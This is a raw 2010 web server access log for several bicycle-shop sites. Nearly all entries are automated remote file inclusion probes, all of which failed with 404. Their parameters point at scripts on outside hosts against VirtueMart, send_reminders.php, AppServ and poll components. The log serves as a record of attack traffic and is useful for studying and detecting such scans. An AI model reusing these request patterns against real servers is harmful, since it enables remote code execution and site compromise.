60.251.165.181 - - [10/Feb/2010:22:33:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:33:59 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:33:59 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.250.198 - - [10/Feb/2010:22:35:20 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.106.250.198 - - [10/Feb/2010:22:35:21 -0800] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.106.250.198 - - [10/Feb/2010:22:35:21 -0800] "GET /translations/Portuguese_BR.txt/tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
60.251.165.181 - - [10/Feb/2010:22:35:23 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:35:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:35:23 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:22:35:39 -0800] "GET /logs/access.log//www/appserv/main.php?appserv_root=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:22:35:40 -0800] "GET /www/appserv/main.php?appserv_root=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:22:35:42 -0800] "GET /logs//www/appserv/main.php?appserv_root=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:37:12 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://korolikhin.ru//data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:22:37:43 -0800] "GET /logs/access.log//www/appserv/main.php?appserv_root=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:22:37:43 -0800] "GET /www/appserv/main.php?appserv_root=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:22:37:44 -0800] "GET /logs//www/appserv/main.php?appserv_root=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
87.106.250.198 - - [10/Feb/2010:22:38:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.250.198 - - [10/Feb/2010:22:38:35 -0800] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.250.198 - - [10/Feb/2010:22:38:35 -0800] "GET /translations/Polish.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.250.198 - - [10/Feb/2010:22:38:43 -0800] "GET /translations/Portuguese_BR.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.193.129 - - [10/Feb/2010:22:42:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:51:46 -0800] "GET /main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:51:46 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:51:46 -0800] "GET /logs//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:51:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:51:54 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:51:54 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.250.198 - - [10/Feb/2010:22:52:31 -0800] "GET /translations/Polish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.250.198 - - [10/Feb/2010:22:52:35 -0800] "GET /translations/Portuguese_BR.txt/tools/send_reminders.php?noSet=0&includedir=http://www.vamosaldelta.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.232.237.122 - - [10/Feb/2010:22:53:42 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.232.237.122 - - [10/Feb/2010:22:53:42 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.232.237.122 - - [10/Feb/2010:22:53:42 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.232.237.122 - - [10/Feb/2010:22:55:05 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.232.237.122 - - [10/Feb/2010:22:55:05 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.232.237.122 - - [10/Feb/2010:22:55:05 -0800] "GET /logs/access.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:55:54 -0800] "GET /logs/access.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:22:58:02 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:22:58:03 -0800] "GET /logs/access.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:22:58:03 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:12 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:12 -0800] "GET /send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:12 -0800] "GET /logs/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:16 -0800] "GET /send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:16 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:16 -0800] "GET /logs/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:43 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:43 -0800] "GET /tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:43 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:58:44 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:58:44 -0800] "GET /send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:58:44 -0800] "GET /logs/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:46 -0800] "GET /logs/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:46 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:22:58:46 -0800] "GET /send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:59:08 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:59:08 -0800] "GET /logs/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:59:08 -0800] "GET /send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:59:50 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:59:50 -0800] "GET /logs/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:22:59:50 -0800] "GET /send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:02:06 -0800] "GET /tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:02:07 -0800] "GET /logs//tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:02:12 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:02:56 -0800] "GET /translations/Dutch.txt%20%20//tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:02:56 -0800] "GET /translations//tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:23:03:13 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:23:03:13 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:23:03:13 -0800] "GET /tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.93.146.76 - - [10/Feb/2010:23:03:32 -0800] "GET /logs/access.log//poll/booth.php?include_path=http://guseynov.org/prog/pl_menu/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.93.146.76 - - [10/Feb/2010:23:03:32 -0800] "GET /logs//poll/booth.php?include_path=http://guseynov.org/prog/pl_menu/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.93.146.76 - - [10/Feb/2010:23:03:33 -0800] "GET /poll/booth.php?include_path=http://guseynov.org/prog/pl_menu/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:03:34 -0800] "GET /tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:03:43 -0800] "GET /logs//tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:03:43 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:04:41 -0800] "GET /translations//tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:23:04:41 -0800] "GET /translations/Dutch.txt%20%20//tools/send_reminders.php?includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:23:05:03 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:23:05:40 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:23:05:40 -0800] "GET /logs/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:23:05:45 -0800] "GET /send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:23:06:20 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.15.158.246 - - [10/Feb/2010:23:06:20 -0800] "GET /translations//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:23:06:32 -0800] "GET /tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:23:06:32 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:23:06:32 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.10 - - [10/Feb/2010:23:08:31 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.bicyclestoreshouston.com"
210.205.6.233 - - [10/Feb/2010:23:10:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:23:11:09 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:23:11:09 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:23:11:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:23:11:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:23:11:45 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:23:11:45 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:23:11:46 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:23:11:46 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.235.124.132 - - [10/Feb/2010:23:15:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.svbikes.com"
66.235.124.132 - - [10/Feb/2010:23:15:45 -0800] "GET /translations/Chinese-GB2312.txt HTTP/1.1" 200 26834 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.svbikes.com"
110.45.146.50 - - [10/Feb/2010:23:16:14 -0800] "GET /poll/booth.php?include_path=http://guseynov.org/prog/pl_menu/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.146.50 - - [10/Feb/2010:23:16:15 -0800] "GET /logs//poll/booth.php?include_path=http://guseynov.org/prog/pl_menu/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.146.50 - - [10/Feb/2010:23:16:16 -0800] "GET /logs/access.log//poll/booth.php?include_path=http://guseynov.org/prog/pl_menu/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:23:18:17 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:23:18:21 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:23:19:08 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:23:22:16 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:23:23:56 -0800] "GET /translations//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:23:23:56 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?includedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:23:33:42 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:23:33:42 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:23:33:42 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:23:34:53 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:23:34:53 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:23:34:57 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:23:40:25 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:23:40:25 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
